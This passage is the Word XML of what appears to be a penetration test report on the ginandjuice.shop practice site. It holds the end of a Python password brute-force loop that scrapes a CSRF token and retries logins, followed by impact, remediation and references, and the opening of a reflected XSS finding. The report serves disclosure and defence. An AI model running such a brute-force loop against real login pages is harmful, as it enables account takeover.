                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>session.get</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                <w:color w:val="D1FAE5"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>(</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                <w:color w:val="D1FAE5"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>url_login</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                <w:color w:val="D1FAE5"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>)</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="7B970E9D" w14:textId="77777777" w:rsidR="00514271" w:rsidRDefault="00877F8D">
            <w:pPr>
              <w:spacing w:after="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                <w:color w:val="D1FAE5"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">        </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                <w:color w:val="D1FAE5"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>csrf_match</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                <w:color w:val="D1FAE5"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve"> = </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:proofErr w:type="gramStart"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                <w:color w:val="D1FAE5"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>re.search</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:proofErr w:type="gramEnd"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                <w:color w:val="D1FAE5"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>(</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                <w:color w:val="D1FAE5"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>r'name</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                <w:color w:val="D1FAE5"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>="csrf"\</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                <w:color w:val="D1FAE5"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>s+value</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                <w:color w:val="D1FAE5"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">="([^"]+)"', </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                <w:color w:val="D1FAE5"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>r.text</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                <w:color w:val="D1FAE5"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>)</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="6D189B96" w14:textId="77777777" w:rsidR="00514271" w:rsidRDefault="00877F8D">
            <w:pPr>
              <w:spacing w:after="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                <w:color w:val="D1FAE5"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">        if not </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                <w:color w:val="D1FAE5"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>csrf_match</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                <w:color w:val="D1FAE5"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>:</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="6415C1C0" w14:textId="77777777" w:rsidR="00514271" w:rsidRDefault="00877F8D">
            <w:pPr>
              <w:spacing w:after="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                <w:color w:val="D1FAE5"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">            print(f"[-] CSRF token not found | Status: {</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:proofErr w:type="gramStart"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                <w:color w:val="D1FAE5"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>r.status</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                <w:color w:val="D1FAE5"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>_code</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                <w:color w:val="D1FAE5"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>}")</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="31B6D11F" w14:textId="77777777" w:rsidR="00514271" w:rsidRDefault="00877F8D">
            <w:pPr>
              <w:spacing w:after="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                <w:color w:val="D1FAE5"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">            break</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="4D815B17" w14:textId="77777777" w:rsidR="00514271" w:rsidRDefault="00877F8D">
            <w:pPr>
              <w:spacing w:after="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                <w:color w:val="D1FAE5"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">        </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                <w:color w:val="D1FAE5"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>csrf_token</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                <w:color w:val="D1FAE5"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve"> = </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                <w:color w:val="D1FAE5"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>csrf_</w:t>
            </w:r>
            <w:proofErr w:type="gramStart"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                <w:color w:val="D1FAE5"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>match.gr</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                <w:color w:val="D1FAE5"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>oup</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:proofErr w:type="gramEnd"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                <w:color w:val="D1FAE5"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>(1)</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="76907079" w14:textId="77777777" w:rsidR="00514271" w:rsidRDefault="00514271">
            <w:pPr>
              <w:spacing w:after="20"/>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="1E37BA1C" w14:textId="77777777" w:rsidR="00514271" w:rsidRDefault="00877F8D">
            <w:pPr>
              <w:spacing w:after="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                <w:color w:val="D1FAE5"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">        data = {"csrf": </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                <w:color w:val="D1FAE5"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>csrf_token</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                <w:color w:val="D1FAE5"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>, "username": username, "password": password}</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="5AEB8A3A" w14:textId="77777777" w:rsidR="00514271" w:rsidRDefault="00877F8D">
            <w:pPr>
              <w:spacing w:after="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                <w:color w:val="D1FAE5"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">        resp = </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:proofErr w:type="gramStart"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                <w:color w:val="D1FAE5"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>session.post</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                <w:color w:val="D1FAE5"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>(</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:proofErr w:type="gramEnd"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                <w:color w:val="D1FAE5"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>url_login</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                <w:color w:val="D1FAE5"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">, data=data, </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                <w:color w:val="D1FAE5"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>allow_redirects</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                <w:color w:val="D1FAE5"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>=False)</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="1922CCE8" w14:textId="77777777" w:rsidR="00514271" w:rsidRDefault="00514271">
            <w:pPr>
              <w:spacing w:after="20"/>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="671BA118" w14:textId="77777777" w:rsidR="00514271" w:rsidRDefault="00877F8D">
            <w:pPr>
              <w:spacing w:after="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                <w:color w:val="D1FAE5"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">        if </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:proofErr w:type="gramStart"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                <w:color w:val="D1FAE5"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>resp.status</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                <w:color w:val="D1FAE5"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>_code</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                <w:color w:val="D1FAE5"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve"> == 302:</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="29FFF421" w14:textId="77777777" w:rsidR="00514271" w:rsidRDefault="00877F8D">
            <w:pPr>
              <w:spacing w:after="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                <w:color w:val="D1FAE5"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">            print(f"[+] SUCCESS! Password: {password}")</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="5B456ABB" w14:textId="77777777" w:rsidR="00514271" w:rsidRDefault="00877F8D">
            <w:pPr>
              <w:spacing w:after="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                <w:color w:val="D1FAE5"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">  </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                <w:color w:val="D1FAE5"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">          break</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="111C727C" w14:textId="77777777" w:rsidR="00514271" w:rsidRDefault="00877F8D">
            <w:pPr>
              <w:spacing w:after="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                <w:color w:val="D1FAE5"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">        </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:proofErr w:type="gramStart"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                <w:color w:val="D1FAE5"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>time.sleep</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:proofErr w:type="gramEnd"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                <w:color w:val="D1FAE5"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>(0.3)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="195CBCF5" w14:textId="77777777" w:rsidR="00514271" w:rsidRDefault="00514271">
      <w:pPr>
        <w:spacing w:after="160"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="15C9B1B0" w14:textId="77777777" w:rsidR="00514271" w:rsidRDefault="00877F8D">
      <w:pPr>
        <w:spacing w:before="120" w:after="100"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="1F2937"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Impact</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="75B266A1" w14:textId="77777777" w:rsidR="00514271" w:rsidRDefault="00877F8D">
      <w:pPr>
        <w:spacing w:after="160" w:line="276" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>Without rate limiting or lockout, attackers can perform large-scale automated password guessing or credential-stuffing attacks using leaked credential lists (e.g., rockyou.txt), leading to account takeover. This is compounded for any accounts reusing passw</w:t>
      </w:r>
      <w:r>
        <w:t>ords from other breached services.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="58182972" w14:textId="77777777" w:rsidR="00514271" w:rsidRDefault="00877F8D">
      <w:pPr>
        <w:spacing w:before="120" w:after="100"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="1F2937"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Remediation</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="31FAD71A" w14:textId="77777777" w:rsidR="00514271" w:rsidRDefault="00877F8D">
      <w:pPr>
        <w:spacing w:after="80"/>
      </w:pPr>
      <w:r>
        <w:t>Implement server-side rate limiting and progressive delays per account and per source IP, enforce account lockout or step-up authentication (CAPTCHA/MFA) after a small number of failed attempts, and monitor/al</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">ert on abnormal </w:t>
      </w:r>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>authentication volume. Rotating the CSRF token alone does not mitigate this class of attack, since it is retrievable per-session as demonstrated above.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7F1ACE5E" w14:textId="77777777" w:rsidR="00514271" w:rsidRDefault="00877F8D">
      <w:pPr>
        <w:spacing w:after="200"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">Reference: </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="426BE8C1" w14:textId="77777777" w:rsidR="00514271" w:rsidRDefault="00877F8D">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:after="60"/>
      </w:pPr>
      <w:hyperlink r:id="rId13" w:history="1">
        <w:r>
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:color w:val="1D4ED8"/>
          </w:rPr>
          <w:t>OWASP Credential Stuffing Prevention Cheat Sheet</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="40CD10A6" w14:textId="77777777" w:rsidR="00514271" w:rsidRDefault="00877F8D">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:after="60"/>
      </w:pPr>
      <w:hyperlink r:id="rId14" w:history="1">
        <w:r>
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:color w:val="1D4ED8"/>
          </w:rPr>
          <w:t>OWASP Authentication Cheat Sheet</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="160496A9" w14:textId="77777777" w:rsidR="00514271" w:rsidRDefault="00877F8D">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:after="60"/>
      </w:pPr>
      <w:hyperlink r:id="rId15" w:history="1">
        <w:proofErr w:type="spellStart"/>
        <w:r>
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:color w:val="1D4ED8"/>
          </w:rPr>
          <w:t>PortSwigger</w:t>
        </w:r>
        <w:proofErr w:type="spellEnd"/>
        <w:r>
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:color w:val="1D4ED8"/>
          </w:rPr>
          <w:t xml:space="preserve"> — Brute-Forcing Login Mechanisms</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="49148984" w14:textId="77777777" w:rsidR="00514271" w:rsidRDefault="00877F8D">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:keepNext/>
        <w:spacing w:before="500" w:after="120"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="1F2937"/>
        </w:rPr>
        <w:t>F-03: Reflected Cross-Site Scripting — Blog Search</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblW w:w="2200" w:type="dxa"/>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514271" w14:paraId="0F782830" w14:textId="77777777">
        <w:tblPrEx>
          <w:tblCellMar>
            <w:top w:w="0" w:type="dxa"/>
            <w:bottom w:w="0" w:type="dxa"/>
          </w:tblCellMar>
        </w:tblPrEx>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="2" w:space="0" w:color="CBD5E1"/>
              <w:left w:val="single" w:sz="2" w:space="0" w:color="CBD5E1"/>
              <w:bottom w:val="single" w:sz="2" w:space="0" w:color="CBD5E1"/>
              <w:right w:val="single" w:sz="2" w:space="0" w:color="CBD5E1"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="B45309"/>
            <w:tcMar>
              <w:top w:w="80" w:type="dxa"/>
              <w:left w:w="160" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:right w:w="160" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p w14:paraId="33EC68AB" w14:textId="77777777" w:rsidR="00514271" w:rsidRDefault="00877F8D">
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>MEDIUM</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="0FAA7888" w14:textId="77777777" w:rsidR="00514271" w:rsidRDefault="00514271">
      <w:pPr>
        <w:spacing w:after="160"/>
      </w:pPr>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblW w:w="5000" w:type="pct"/>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7446"/>
      </w:tblGrid>
      <w:tr w:rsidR="00514271" w14:paraId="05AABB9A"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19DEAAA3" w14:textId="77777777" w:rsidR="00514271" w:rsidRDefault="00877F8D">
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">CVSS 3.1 </w:t>
            </w:r>
            <w:proofErr w:type="gramStart"/>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Score</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>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0E44EFA8" w14:textId="77777777" w:rsidR="00514271" w:rsidRDefault="00877F8D">
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>5.4 (</w:t>
            </w:r>
            <w:proofErr w:type="gramStart"/>
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>AV:N</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00514271" w14:paraId="3F18230A"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01EBC5EF" w14:textId="77777777" w:rsidR="00514271" w:rsidRDefault="00877F8D">
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>CWE</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4D152423" w14:textId="77777777" w:rsidR="00514271" w:rsidRDefault="00877F8D">
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>CWE-79: Improper Neutralization of Input During Web Page Generation (XSS)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00514271" w14:paraId="71143D0E"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1C051CB0" w14:textId="77777777" w:rsidR="00514271" w:rsidRDefault="00877F8D">
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Affected URL</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0B2A4E8D" w14:textId="77777777" w:rsidR="00514271" w:rsidRDefault="00877F8D">
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>https://ginandjuice.shop/blog/?search=</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
